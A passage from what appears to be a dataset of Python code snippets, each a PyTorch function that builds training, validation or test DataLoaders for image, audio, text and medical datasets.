+\"/test\",\n transform=transforms.Compose([\n transforms.Resize(32), \n transforms.ToTensor(),\n # Phuong 09/26 change (mean, std) -> same as pretrained imagenet\n transforms.Normalize(mean=imagenet_mean, std=imagenet_std)])),\n #Phuong 09/26 drop_last=False -> True\n batch_size=test_bs, drop_last=True)\n\n return train_dl, test_dl, None, None\n\n\n else:\n dl_obj = Generated\n transform_train = None\n transform_test = None\n\n\n train_ds = dl_obj(datadir, dataidxs=dataidxs, train=True, transform=transform_train, download=True)\n test_ds = dl_obj(datadir, train=False, transform=transform_test, download=True)\n\n train_dl = data.DataLoader(dataset=train_ds, batch_size=train_bs, shuffle=True, drop_last= dataset in ['cifar100'])\n test_dl = data.DataLoader(dataset=test_ds, batch_size=test_bs, shuffle=False, drop_last=False)\n\n return train_dl, test_dl, train_ds, test_ds", "def __init__(self, **kwargs):\n DataLoader.__init__(self, **kwargs)", "def get_dataloader(self):\n shuffle = True if self.mode == \"train\" else False\n return DataLoader(self.get_dataset(), batch_size=self.batch_size, shuffle = shuffle, \n collate_fn=create_mini_batch)", "def dataloaders():\n # train data path\n data_train = '../dataset/train/'\n # set transformations\n train_transforms = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])])\n \n train_data = datasets.ImageFolder(data_train, transform = train_transforms)\n trainloader = torch.utils.data.DataLoader(train_data, batch_size = 16, shuffle = True)\n \n return trainloader", "def get_data_loader(batch_size=10, num_workers=2):\n \n data_loader = torch.utils.data.DataLoader(dataset=TempuckeyDataSet(),\n batch_size=batch_size,\n shuffle=True,\n pin_memory=True,\n num_workers=num_workers,\n collate_fn=collate)\n return data_loader", "def get_dataloader(dataset, batchsize):\n\n train_set_size = int(0.8 * dataset.__len__())\n train_indices = np.random.choice(np.arange(dataset.__len__()),\n train_set_size, replace=False)\n train_sampler = SubsetRandomSampler(train_indices)\n\n val_indices = np.setdiff1d(np.arange(dataset.__len__()),\n train_indices, assume_unique=True)\n val_sampler = SubsetRandomSampler(val_indices)\n\n trainloader = DataLoader(dataset, batch_size=batchsize,\n sampler=train_sampler, num_workers=2)\n valloader = DataLoader(dataset, batch_size=batchsize,\n sampler=val_sampler, num_workers=2)\n\n return trainloader, valloader", "def data_loader(root, batch_size=64):\n input_transform = get_transform()\n dataset = CustomDataset(root, input_transform)\n return data.DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=False)", "def get_train_loader(batch_size, train_set, train_sampler):\n train_loader = torch.utils.data.DataLoader(train_set, batch_size=batch_size, sampler=train_sampler, num_workers=4)\n\n return train_loader", "def _custom_data_loader(self) -> DataLoader:\n dataloaders = DataLoader(self.dataset, batch_size=1)\n return dataloaders", "def get_loader(data, json, batch_size, shuffle, num_workers):\n dataset = FinNumDataset(data, json)\n\n data_loader = torch.utils.data.DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n num_workers=num_workers,\n collate_fn=collate_fn)\n return data_loader", "def test_dataloader(self) -> DataLoader:\n return self._custom_data_loader()", "def build_training_data_loader(self) -> DataLoader:\n pass", "def data_loader(\n self, batch_size: int = 1, iter_steps: int = 0, batch_as_list: bool 
= True\n ) -> DataLoader:\n data = self.data\n datasets = []\n\n for _, dat in data.items():\n datasets.append(dat.dataset())\n\n if len(datasets) < 1:\n raise FileNotFoundError(\n \"no datasets available for this model to create a loader from\"\n )\n\n return DataLoader(\n *datasets,\n batch_size=batch_size,\n iter_steps=iter_steps,\n batch_as_list=batch_as_list,\n )", "def get_data_loaders(args, tokenizer):\n personachat = get_dataset(tokenizer, args.dataset_path, args.dataset_cache, args.train_lang)\n _ = personachat.pop(\"test\", None)\n logger.info(\"Build inputs and labels\")\n datasets = {\"train\": [], \"valid\": []}\n\n if args.train_lang in [\"En\", \"Fr\", \"It\", \"Id\", \"Jp\", \"Ko\", \"Zh\"]: #monolingual data\n for dataset_name, dataset in personachat.items():\n for dial in dataset[args.train_lang]: #dial: {\"persona\":[], \"history\":[], \"response\":str}\n instance = build_input_from_segments(dial[\"persona\"], dial[\"history\"][-args.max_turns:], dial[\"response\"], tokenizer, lm_labels = True)\n datasets[dataset_name].append(instance) \n else: #multilingual data\n for dataset_name, dataset in personachat.items():\n for lang, dials in dataset.items():\n for dial in dials: #dial: {\"persona\":[], \"history\":[], \"response\":str}\n instance = build_input_from_segments(dial[\"persona\"], dial[\"history\"][-args.max_turns:], dial[\"response\"], tokenizer, lang_id=\"<{}>\".format(lang.lower()), lm_labels = True)\n datasets[dataset_name].append(instance) #all langs together\n\n\n logger.info(\"Build train and validation dataloaders\")\n train_dataset = DatasetTrain(datasets[\"train\"])\n valid_dataset = DatasetTrain(datasets[\"valid\"])\n\n #logger.info(\"Build train and validation dataloaders\")\n #train_dataset, valid_dataset = TensorDataset(*tensor_datasets[\"train\"]), TensorDataset(*tensor_datasets[\"valid\"])\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset) if args.distributed else None\n valid_sampler = torch.utils.data.distributed.DistributedSampler(valid_dataset) if args.distributed else None\n train_loader = DataLoader(train_dataset, sampler=train_sampler, batch_size=args.train_batch_size, shuffle=(not args.distributed), collate_fn=collate_fn)\n valid_loader = DataLoader(valid_dataset, sampler=valid_sampler, batch_size=args.valid_batch_size, shuffle=False, collate_fn=collate_fn)\n\n # logger.info(\"Train dataset (Batch, Candidates, Seq length): {}\".format(train_dataset.tensors[0].shape))\n # #logger.info(\"Train dataset (Batch, Candidates, Seq length): {}\".format(train_dataset.tensors[1].shape))\n # logger.info(\"Valid dataset (Batch, Candidates, Seq length): {}\".format(valid_dataset.tensors[0].shape))\n logger.info(\"Train dataset length: {}\".format(len(train_dataset)))\n logger.info(\"Valid dataset length: {}\".format(len(valid_dataset)))\n return train_loader, valid_loader, train_sampler, valid_sampler", "def _init_al_dataset(self):\n\n self._init_dataset()\n\n train_dataset = self.datasets['train']\n\n dataset_size = len(train_dataset)\n self.budget = math.ceil(self.budget_frac*dataset_size)\n Sampler.__init__(self, config, self.budget) # TODO: Weird place to initialise this\n\n all_indices = set(np.arange(dataset_size))\n k_initial = math.ceil(len(all_indices)*self.initial_budget_frac)\n initial_indices = random.sample(list(all_indices), k=k_initial)\n\n sampler_init = data.sampler.SubsetRandomSampler(initial_indices) # need to sample from training dataset\n\n self.labelled_dataloader = data.DataLoader(train_dataset, 
sampler=sampler_init, batch_size=self.batch_size, drop_last=True)\n self.val_dataloader = data.DataLoader(self.datasets['valid'], batch_size=self.batch_size, drop_last=False)\n self.test_dataloader = data.DataLoader(self.datasets['test'], batch_size=self.batch_size, drop_last=False)\n\n return all_indices, initial_indices", "def get_dataloaders(args):\n if args.dataset == 'heat':\n dataset_class = heat.HeatDiffusionDataset\n else:\n raise ValueError(f'Unknown dataset {args.dataset}')\n train_dataset = dataset_class(\n dataset_class.get_train_path(args.data_path), args, train=True)\n if args.dist:\n train_sampler = torch.utils.data.distributed.DistributedSampler(\n train_dataset)\n else:\n train_sampler = torch.utils.data.RandomSampler(train_dataset)\n train_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.batch_size, num_workers=args.workers,\n sampler=train_sampler, pin_memory=True, drop_last=args.drop_last)\n if not args.no_eval:\n validation_dataset = dataset_class(\n dataset_class.get_validation_path(args.data_path), args, train=False)\n if args.dist:\n validation_sampler = torch.utils.data.distributed.DistributedSampler(\n validation_dataset, shuffle=False)\n else:\n validation_sampler = torch.utils.data.SequentialSampler(\n validation_dataset)\n validation_loader = torch.utils.data.DataLoader(\n validation_dataset, batch_size=args.batch_size,\n num_workers=args.workers, sampler=validation_sampler,\n pin_memory=True, drop_last=args.drop_last)\n\n test_dataset = dataset_class(\n dataset_class.get_test_path(args.data_path), args, train=False)\n if args.dist:\n test_sampler = torch.utils.data.distributed.DistributedSampler(\n test_dataset, shuffle=False)\n else:\n test_sampler = torch.utils.data.SequentialSampler(\n test_dataset)\n test_loader = torch.utils.data.DataLoader(\n test_dataset, batch_size=args.batch_size,\n num_workers=args.workers, sampler=test_sampler,\n pin_memory=True, drop_last=args.drop_last)\n else:\n validation_loader = None\n test_loader = None\n\n # Update the data shape if needed.\n if args.data_shape is None:\n args.data_shape = train_dataset.get_shape()\n if args.data_target_shape is None:\n args.data_target_shape = train_dataset.get_target_shape()\n\n return train_loader, validation_loader, test_loader", "def create_dataset_sampler_loader(file_path, cuda, batch_size, hvd):\n # When supported, use 'forkserver' to spawn dataloader workers\n # instead of 'fork' to prevent issues with Infiniband implementations\n # that are not fork-safe.\n kwargs = {'num_workers': 1, 'pin_memory': True} if cuda else {}\n if (kwargs.get('num_workers', 0) > 0 and hasattr(mp, '_supports_context')\n and 'forkserver' in mp.get_all_start_methods()):\n kwargs['multiprocessing_context'] = 'forkserver'\n\n # create dataset\n dataset = MNISTDataset(file_path)\n # Horovod: use DistributedSampler to partition the training data\n sampler = Data.distributed.DistributedSampler(\n dataset, num_replicas=hvd.size(), rank=hvd.rank())\n loader = torch.utils.data.DataLoader(\n dataset, batch_size=batch_size, sampler=sampler, **kwargs)\n return dataset, sampler, loader", "def to_DataLoader(self, **kwargs):\r\n return DataLoader(self, **kwargs)", "def data_creator(config):\n train_dataset, val_dataset = LinearDataset(2, 5), LinearDataset(2, 5)\n train_loader = DataLoader(train_dataset, batch_size=config[\"batch_size\"])\n val_loader = DataLoader(val_dataset, batch_size=config[\"batch_size\"])\n return train_loader, val_loader", "def make_dataloaders(params):\r\n transform_train = 
transforms.Compose([transforms.RandomCrop(32, padding=4),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize([0.4914, 0.4822, 0.4465], [0.2023, 0.1994, 0.2010])])\r\n\r\n transform_validation = transforms.Compose([transforms.ToTensor(),\r\n transforms.Normalize([0.4914, 0.4822, 0.4465],\r\n [0.2023, 0.1994, 0.2010])])\r\n\r\n transform_validation = transforms.Compose([transforms.ToTensor()])\r\n\r\n trainset = torchvision.datasets.CIFAR10(root=params['path'], train=True, transform=transform_train)\r\n testset = torchvision.datasets.CIFAR10(root=params['path'], train=False, transform=transform_validation)\r\n\r\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=params['batch_size'], shuffle=True, num_workers=4)\r\n testloader = torch.utils.data.DataLoader(testset, batch_size=params['batch_size'], shuffle=False, num_workers=4)\r\n return trainloader, testloader", "def load_data(batch_size=batch_size):\n trainset = LibriSpeechDataset(training_set, int(LIBRISPEECH_SAMPLING_RATE * n_seconds))\n testset = LibriSpeechDataset(validation_set, int(LIBRISPEECH_SAMPLING_RATE * n_seconds), stochastic=False)\n\n train_loader = DataLoader(trainset, batch_size=batch_size, num_workers=1, shuffle=True, drop_last=True)\n test_loader = DataLoader(testset, batch_size=1, num_workers=1, drop_last=True)\n\n return train_loader, test_loader", "def initialize_dataloaders(\n self, X: Union[np.ndarray, pd.DataFrame], y: Union[np.ndarray, np.array]\n ):\n training_design_matrix, training_targets_array, validation_design_matrix, validation_targets_array = self.generate_training_validation_split(\n X, y\n )\n training_dataloader_kwargs = {\n \"design_matrix\": training_design_matrix,\n \"targets_array\": training_targets_array,\n \"data_type\": self.data_type,\n \"batch_size\": self.batch_size,\n \"shuffle\": self.shuffle_training_examples,\n }\n validation_dataloader_kwargs = {\n \"design_matrix\": validation_design_matrix,\n \"targets_array\": validation_targets_array,\n \"data_type\": self.data_type,\n \"batch_size\": self.batch_size,\n \"shuffle\": False,\n }\n self.training_dataloader = self.generate_dataloader(**training_dataloader_kwargs)\n self.validation_dataloader = self.generate_dataloader(**validation_dataloader_kwargs)", "def get_dataloaders(data_dir,train_batch_size,val_batch_size,aug_flag):\n # Create the dataset object.\n transformed_dataset = PersonDataset(data_dir,False)\n # dataloader for train and validation\n validation_split = 0.2\n shuffle_dataset = True\n #random seed to keep the train-val split constant for inference purpose\n random_seed= 42\n # create indices for training and validation splits.\n dataset_size = len(transformed_dataset)\n # we create the indices using python range function and store it into a list\n indices = list(range(dataset_size))\n split = int(np.floor(validation_split*dataset_size))\n if shuffle_dataset:\n np.random.seed(random_seed)\n np.random.shuffle(indices)\n train_indices,val_indices = indices[split:],indices[:split]\n # create dataloaders...\n train_sampler = SubsetRandomSampler(train_indices)\n val_sampler = SubsetRandomSampler(val_indices)\n train_aug,val_aug = aug_flag,False\n train_loader = DataLoader(PersonDataset(data_dir,train_aug), batch_size=train_batch_size, shuffle=False, num_workers=0,sampler = train_sampler)\n val_loader = DataLoader(PersonDataset(data_dir,val_aug), batch_size=val_batch_size, shuffle=False, num_workers=0,sampler = val_sampler)\n\n # dictionary for data loaders..\n dataloaders = 
{\"train\" :train_loader,\n \"val\":val_loader\n }\n return dataloaders", "def torch_dataset_loader(dataset, batch_size, shuffle, kwargs):\n loader = DataLoader(TorchData(dataset),\n batch_size=batch_size,\n shuffle=shuffle,\n **kwargs)\n return loader", "def get_dataloader(data_folder, model_name, data_name, size=\"default\"):\n training_set = None\n validation_set = None\n\n if model_name == \"Howe_Patterson\":\n if data_name == \"combined\":\n partition = []\n for data_fold in data_folder:\n partition.append(load_obj(os.path.join(data_fold, 'data_partition.pkl')))\n\n elif size == \"small\":\n partition = load_obj(os.path.join(data_folder, 'data_partition_small.pkl'))\n elif size == \"tiny\":\n partition = load_obj(os.path.join(data_folder, 'data_partition_tiny.pkl'))\n else:\n partition = load_obj(os.path.join(data_folder, 'data_partition.pkl'))\n\n\n if data_name == \"SHHS\":\n training_set = Dataset_full_SHHS(partition['train'], data_folder)\n validation_set = Dataset_full_SHHS(partition['validation'], data_folder)\n elif data_name == \"snooze\":\n training_set = Dataset_full(partition['train'], data_folder)\n validation_set = Dataset_full(partition['validation'], data_folder)\n elif data_name == \"philips\":\n training_set = Dataset_Philips_full(partition['train'], data_folder)\n validation_set = Dataset_Philips_full(partition['validation'], data_folder)\n elif data_name == \"HMC\":\n print(\"{} not implemented data\".format(data_name))\n exit()\n elif data_name == \"combined\":\n training_set = ConcatDataset(\n Dataset_full(partition[0]['train'], data_folder[0], downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False),\n Dataset_full_SHHS(partition[1]['train'], data_folder[1], downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False))\n validation_set = ConcatDataset(\n Dataset_full(partition[0]['validation'], data_folder[0], downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False),\n Dataset_full_SHHS(partition[1]['validation'], data_folder[1], downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False))\n else:\n print(\"{} wrong data for dataloader\".format(data_name))\n exit()\n elif model_name == \"Deep_Sleep\":\n if data_name == \"combined\":\n partition = []\n for data_fold in data_folder:\n partition.append(load_obj(os.path.join(data_fold, 'data_partition.pkl')))\n\n elif size == \"small\":\n partition = load_obj(os.path.join(data_folder, 'data_partition_small.pkl'))\n elif size == \"tiny\":\n partition = load_obj(os.path.join(data_folder, 'data_partition_tiny.pkl'))\n else:\n partition = load_obj(os.path.join(data_folder, 'data_partition.pkl'))\n\n if data_name == \"SHHS\":\n training_set = Dataset_full_SHHS(partition['train'], data_folder, downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False)\n validation_set = Dataset_full_SHHS(partition['validation'], data_folder, downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False)\n elif data_name == \"snooze\":\n training_set = Dataset_full(partition['train'], data_folder, downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False)\n validation_set = Dataset_full(partition['validation'], data_folder, downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False)\n elif data_name == \"philips\":\n training_set = Dataset_Philips_full(partition['train'], data_folder, downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False)\n validation_set = 
Dataset_Philips_full(partition['validation'], data_folder, downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False)\n elif data_name == \"HMC\":\n print(\"{} not implemented data\".format(data_name))\n exit()\n elif data_name == \"combined\":\n # TODO combined dataset https://discuss.pytorch.org/t/train-simultaneously-on-two-datasets/649/17\n training_set = ConcatDataset(\n Dataset_full(partition[0]['train'], data_folder[0], downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False),\n Dataset_full_SHHS(partition[1]['train'], data_folder[1], downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False))\n validation_set = ConcatDataset(\n Dataset_full(partition[0]['validation'], data_folder[0], downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False),\n Dataset_full_SHHS(partition[1]['validation'], data_folder[1], downsample_ratio=4,\n pre_allocation=2 ** 22, down_sample_annotation=False))\n else:\n print(\"{} wrong data for dataloader\".format(data_name))\n exit()\n elif model_name == \"ConvNet_IID\":\n if data_name == \"combined\":\n partition = []\n for data_fold in data_folder:\n partition.append(load_obj(os.path.join(data_fold, 'data_partition_IID_windows.pkl')))\n else:\n partition = load_obj(os.path.join(data_folder, 'data_partition_IID_windows.pkl'))\n if data_name == \"SHHS\":\n training_set = Dataset_IID_window_SHHS(partition['train'], data_folder)\n validation_set = Dataset_IID_window_SHHS(partition['validation'], data_folder)\n elif data_name == \"snooze\":\n training_set = Dataset_IID_window(partition['train'], data_folder)\n validation_set = Dataset_IID_window(partition['validation'], data_folder)\n elif data_name == \"philips\":\n print(\"{} not implemented data\".format(data_name))\n exit()\n elif data_name == \"HMC\":\n print(\"{} not implemented data\".format(data_name))\n exit()\n elif data_name == \"combined\":\n training_set = ConcatDataset(\n Dataset_IID_window(partition[0]['train'], data_folder[0]),\n Dataset_IID_window_SHHS(partition[1]['train'], data_folder[1]))\n validation_set = ConcatDataset(\n Dataset_IID_window(partition[0]['validation'], data_folder[0]),\n Dataset_IID_window_SHHS(partition[1]['validation'], data_folder[1]))\n else:\n print(\"{} wrong data for dataloader\".format(data_name))\n exit()\n\n else:\n print(\"{} wrong model for dataloader\".format(model_name))\n exit()\n\n return training_set, validation_set", "def get_loader(\n data_source: Iterable[dict],\n open_fn: Callable,\n dict_transform: Callable = None,\n sampler=None,\n collate_fn: Callable = default_collate_fn,\n batch_size: int = 32,\n num_workers: int = 4,\n shuffle: bool = False,\n drop_last: bool = False,\n):\n from catalyst.data.dataset import ListDataset\n\n dataset = ListDataset(\n list_data=data_source, open_fn=open_fn, dict_transform=dict_transform,\n )\n loader = torch.utils.data.DataLoader(\n dataset=dataset,\n sampler=sampler,\n collate_fn=collate_fn,\n batch_size=batch_size,\n num_workers=num_workers,\n shuffle=shuffle,\n pin_memory=torch.cuda.is_available(),\n drop_last=drop_last,\n )\n return loader", "def val_dataloader(self):\r\n val_dataset = pv.data.Kinetics(\r\n data_path=os.path.join(self._DATA_PATH, \"val\"),\r\n clip_sampler=pv.data.make_clip_sampler(\"uniform\", self._CLIP_DURATION),\r\n decode_audio=False,\r\n )\r\n return torch.utils.data.DataLoader(\r\n val_dataset,\r\n batch_size=self._BATCH_SIZE,\r\n num_workers=self._NUM_WORKERS,\r\n )", "def create_dataloaders(data_dir):\n\n trng_dataset = 
datasets.ImageFolder(data_dir / TRNG_FOLDER,\n transform=flowernet.trng_transform)\n trng_dataloader = torch.utils.data.DataLoader(trng_dataset,\n batch_size=64,\n shuffle=True)\n\n valn_dataset = datasets.ImageFolder(data_dir / VALN_FOLDER,\n transform=flowernet.pred_transform)\n valn_dataloader = torch.utils.data.DataLoader(valn_dataset,\n batch_size=64,\n shuffle=True)\n\n return trng_dataloader, valn_dataloader", "def loadData(self):\n batch_size = 256\n \n #if self.conv_sg == True:\n # batch_size = 1 \n \n download = True\n root = self.root + self.dataset\n if self.dataset == \"MNIST\": \n transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))])\n trainset = torchvision.datasets.MNIST(root, train=True, download=download, transform=transform)\n testset = torchvision.datasets.MNIST(root, train=False, download=download, transform=transform)\n \n if self.dataset == \"CIFAR10\":\n transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465,), (0.2023, 0.1994, 0.2010,))])\n trainset = torchvision.datasets.CIFAR10(root, train=True, download=download, transform=transform)\n testset = torchvision.datasets.CIFAR10(root, train=False, download=download, transform=transform)\n \n if self.dataset == \"CIFAR100\":\n transform = transforms.Compose([transforms.ToTensor()])\n trainset = torchvision.datasets.CIFAR100(root, train=True, download=download, transform=transform)\n testset = torchvision.datasets.CIFAR100(root, train=False, download=download, transform=transform)\n \n \n trainloader = torch.utils.data.DataLoader(trainset, batch_size = batch_size,\n shuffle=False, num_workers=0, pin_memory = False)\n \n testloader = torch.utils.data.DataLoader(testset, batch_size= batch_size,\n shuffle=False, num_workers=2, pin_memory = False)\n \n return trainloader, testloader", "def train_dataloader(self, batch_size: Optional[int] = None) -> DataLoader:\n dataset = TabularDataset(\n task=self.config.task,\n data=self.train,\n categorical_cols=self.config.categorical_cols,\n continuous_cols=self.config.continuous_cols,\n embed_categorical=(not self.do_leave_one_out_encoder()),\n target=self.target,\n )\n return DataLoader(\n dataset,\n batch_size if batch_size is not None else self.batch_size,\n shuffle=True if self.train_sampler is None else False,\n num_workers=self.config.num_workers,\n sampler=self.train_sampler,\n pin_memory=self.config.pin_memory,\n )", "def create_val_dataloader(configs, mode):\n val_sampler = None\n val_dataset = KittiDataset(configs, mode=mode, lidar_aug=None, hflip_prob=0., num_samples=configs.num_samples)\n if configs.distributed:\n val_sampler = torch.utils.data.distributed.DistributedSampler(val_dataset, shuffle=False)\n val_dataloader = DataLoader(val_dataset, batch_size=configs.batch_size, shuffle=False,\n pin_memory=configs.pin_memory, num_workers=configs.num_workers, sampler=val_sampler)\n\n return val_dataloader", "def load_dataset():\n\n\n train_dd_loader = DailyDialogLoader(PATH_TO_TRAIN_DATA, load=False)\n train_dataloader = DataLoader(train_dd_loader, batch_size=16, shuffle=True, num_workers=0,\n collate_fn=PadCollate())\n\n test_dd_loader = DailyDialogLoader(PATH_TO_TEST_DATA, load=True)\n test_dataloader = DataLoader(test_dd_loader, batch_size=1, shuffle=False, num_workers=0,\n collate_fn=PadCollate())\n\n assert train_dd_loader.vocabulary.n_words == test_dd_loader.vocabulary.n_words\n\n return train_dd_loader, train_dataloader, test_dataloader", "def val_dataloader(self) -> 
DataLoader:\n return DataLoader(\n self.valid_dataset,\n batch_size=self.hparams.batch_size,\n shuffle=False,\n num_workers=multiprocessing.cpu_count(),\n )", "def dataloader_msrvtt_train(args, tokenizer):\n\n msrvtt_train_set = MSRVTT_multi_sentence_dataLoader(\n csv_path=args.train_csv,\n json_path=args.data_path,\n features_path=args.features_path,\n max_words=args.max_words,\n feature_framerate=args.feature_framerate,\n tokenizer=tokenizer,\n max_frames=args.max_frames,\n )\n\n train_sampler = torch.utils.data.distributed.DistributedSampler(msrvtt_train_set)\n\n dataloader = DataLoader(\n msrvtt_train_set,\n batch_size=args.batch_size // args.n_gpu,\n num_workers=args.num_thread_reader,\n pin_memory=False,\n shuffle=(train_sampler is None),\n sampler=train_sampler,\n drop_last=True,\n )\n\n return dataloader, len(msrvtt_train_set), train_sampler", "def load_dataloaders(args):\n logger.info(\"Loading dataloaders...\")\n p_path = os.path.join(\"./data/\", \"df_unencoded.pkl\")\n train_path = os.path.join(\"./data/\", \"df_encoded.pkl\")\n if (not os.path.isfile(p_path)) and (not os.path.isfile(train_path)):\n df = get_data(args, load_extracted=False)\n elif os.path.isfile(p_path) and (not os.path.isfile(train_path)):\n df = get_data(args, load_extracted=True)\n elif os.path.isfile(train_path):\n df = load_pickle(\"df_encoded.pkl\")\n \n # Train-Test split\n msk = np.random.rand(len(df)) < args.train_test_ratio\n trainset = df[msk]\n testset = df[~msk]\n \n trainset = text_dataset(trainset, args)\n max_features_length = trainset.max_x_len\n max_seq_len = trainset.max_y_len\n train_length = len(trainset)\n train_loader = DataLoader(trainset, batch_size=args.batch_size, shuffle=True,\\\n num_workers=0, collate_fn=Pad_Sequence(), pin_memory=False)\n \n testset = text_dataset(testset, args)\n test_length = len(testset)\n test_loader = DataLoader(testset, batch_size=args.batch_size, shuffle=True,\\\n num_workers=0, collate_fn=Pad_Sequence(), pin_memory=False)\n return train_loader, train_length, max_features_length, max_seq_len, test_loader, test_length", "def val_dataloader(self) -> data.DataLoader:\n return data.DataLoader(dataset=self.datasets['valid'], batch_size=self.batch_size,\n num_workers=self.num_workers, shuffle=False, pin_memory=False)", "def create_test_dataloader(configs):\n\n test_dataset = KittiDataset(configs, mode='test', lidar_aug=None, hflip_prob=0., num_samples=configs.num_samples)\n test_sampler = None\n if configs.distributed:\n test_sampler = torch.utils.data.distributed.DistributedSampler(test_dataset)\n test_dataloader = DataLoader(test_dataset, batch_size=configs.batch_size, shuffle=False,\n pin_memory=configs.pin_memory, num_workers=configs.num_workers, sampler=test_sampler)\n\n return test_dataloader", "def creates_data_loader():\n dataset_faces = FaceDataset(\n IMG_DIR, transform=transform_train, face=True)\n\n dataset_no_faces = FaceDataset(\n IMG_DIR, transform=transform_train, face=False)\n\n datasets_faces_split = train_val_test(dataset_faces, 0.2, 0.0)\n datasets_no_faces_split = train_val_test(dataset_no_faces, 0.2, 0.0)\n\n datasets = {}\n datasets[\"train\"] = datasets_faces_split[\"train\"] + \\\n datasets_no_faces_split[\"train\"]\n datasets[\"test\"] = datasets_no_faces_split[\"test\"]\n datasets[\"val\"] = datasets_faces_split[\"val\"] + \\\n datasets_no_faces_split[\"val\"]\n\n train_loader = DataLoader(dataset=datasets[\"train\"], batch_size=BATCH_SIZE,\n num_workers=NUM_WORKERS, pin_memory=PIN_MEMORY, shuffle=True, drop_last=False)\n\n val_loader = 
DataLoader(dataset=datasets[\"val\"], batch_size=BATCH_SIZE,\n num_workers=NUM_WORKERS, pin_memory=PIN_MEMORY, shuffle=True, drop_last=False)\n return train_loader, val_loader", "def get_loader(dataset='train.txt', crop_size=128, image_size=28, batch_size=2, mode='train', num_workers=1): \n transform = [] \n if mode == 'train': \n transform.append(transforms.RandomHorizontalFlip()) \n transform.append(transforms.CenterCrop(crop_size)) \n transform.append(transforms.Resize(image_size)) \n transform.append(transforms.ToTensor()) \n transform.append(transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))) \n transform = transforms.Compose(transform) \n train_data=MyDataset(txt=dataset, transform=transform) \n data_loader = DataLoader(dataset=train_data, \n batch_size=batch_size, \n shuffle=(mode=='train'), \n num_workers=num_workers) \n return data_loader", "def get_loader(data_list, config, train=True):\n \n with open(config[\"label_map\"], \"r\") as f:\n label_map = json.load(f)\n\n dataset = GoogleSpeechDataset(\n data_list=data_list,\n label_map=label_map,\n audio_settings=config[\"hparams\"][\"audio\"],\n aug_settings=config[\"hparams\"][\"augment\"] if train else None,\n cache=config[\"exp\"][\"cache\"]\n )\n\n dataloader = DataLoader(\n dataset,\n batch_size=config[\"hparams\"][\"batch_size\"],\n num_workers=config[\"exp\"][\"n_workers\"],\n pin_memory=config[\"exp\"][\"pin_memory\"],\n shuffle=True if train else False\n )\n\n return dataloader", "def prepare_anndata(anndata, batch_size, shuffle=False):\n # Add shuffling here\n if sparse.issparse(anndata.X):\n data = anndata.X.A\n else:\n data = anndata.X\n data = torch.Tensor(data)\n my_dataloader = torch.utils.data.DataLoader(data, shuffle=shuffle, batch_size=batch_size)\n return my_dataloader", "def fetch_dataloader(types, data_dir, hyper_params, train_idx=None, val_idx=None):\n dataloaders = {}\n \n # TODO: write this to hyper_params, make hyper_params an out variable? then save? 
yes, AND: when ONLY test is requested, load from hyperparams!\n # TODO: also, add 3rd variation of types: for testing, only read it from hyper_params (DO I NEED TO READ HYPER_PARAMS FOR JUST TESTING?)\n if train_idx is not None:\n mean, std = mean_std_calc(DataLoader(Subset(Heart2DSegmentationDataset(str(Path(data_dir) / \"train_heart_scans\"), hyper_params.endo_or_epi), train_idx)))\n hyper_params.mean = mean.item()\n hyper_params.std = std.item()\n else:\n if 'train' in types:\n mean, std = mean_std_calc(DataLoader(Heart2DSegmentationDataset(str(Path(data_dir) / \"train_heart_scans\"), hyper_params.endo_or_epi)))\n hyper_params.mean = mean.item()\n hyper_params.std = std.item()\n else:\n mean, std = torch.tensor(hyper_params.mean), torch.tensor(hyper_params.std)\n \n print(\"Mean: {}, Std: {}\".format(mean.item(), std.item()))\n # borrowed from http://pytorch.org/tutorials/advanced/neural_style_tutorial.html\n # and http://pytorch.org/tutorials/beginner/data_loading_tutorial.html\n train_transformer = transforms.Compose([\n transforms.Normalize(mean=[mean.item()], std=[std.item()])\n ])\n \n eval_transformer = transforms.Compose([\n transforms.Normalize(mean=[mean.item()], std=[std.item()])\n ])\n\n for split in ['train', 'val', 'test']:\n if split in types:\n path = str(Path(data_dir) / \"{}_heart_scans\".format(split if split != 'val' else 'train'))\n\n if split == 'train':\n if train_idx is not None:\n dl = DataLoader(Subset(Heart2DSegmentationDataset(path, hyper_params.endo_or_epi, train_transformer), train_idx), \n batch_size=hyper_params.batch_size, \n shuffle=True,\n num_workers=hyper_params.num_workers,\n pin_memory=hyper_params.cuda)\n else:\n dl = DataLoader(Heart2DSegmentationDataset(path, hyper_params.endo_or_epi, train_transformer), \n batch_size=hyper_params.batch_size, \n shuffle=True,\n num_workers=hyper_params.num_workers,\n pin_memory=hyper_params.cuda)\n else:\n if (split == 'val') and (val_idx is not None): \n dl = DataLoader(Subset(Heart2DSegmentationDataset(path, hyper_params.endo_or_epi, eval_transformer), val_idx), \n batch_size=hyper_params.batch_size, \n shuffle=False,\n num_workers=hyper_params.num_workers,\n pin_memory=hyper_params.cuda) \n else:\n dl = DataLoader(Heart2DSegmentationDataset(path, hyper_params.endo_or_epi, eval_transformer), \n batch_size=hyper_params.batch_size, \n shuffle=False,\n num_workers=hyper_params.num_workers,\n 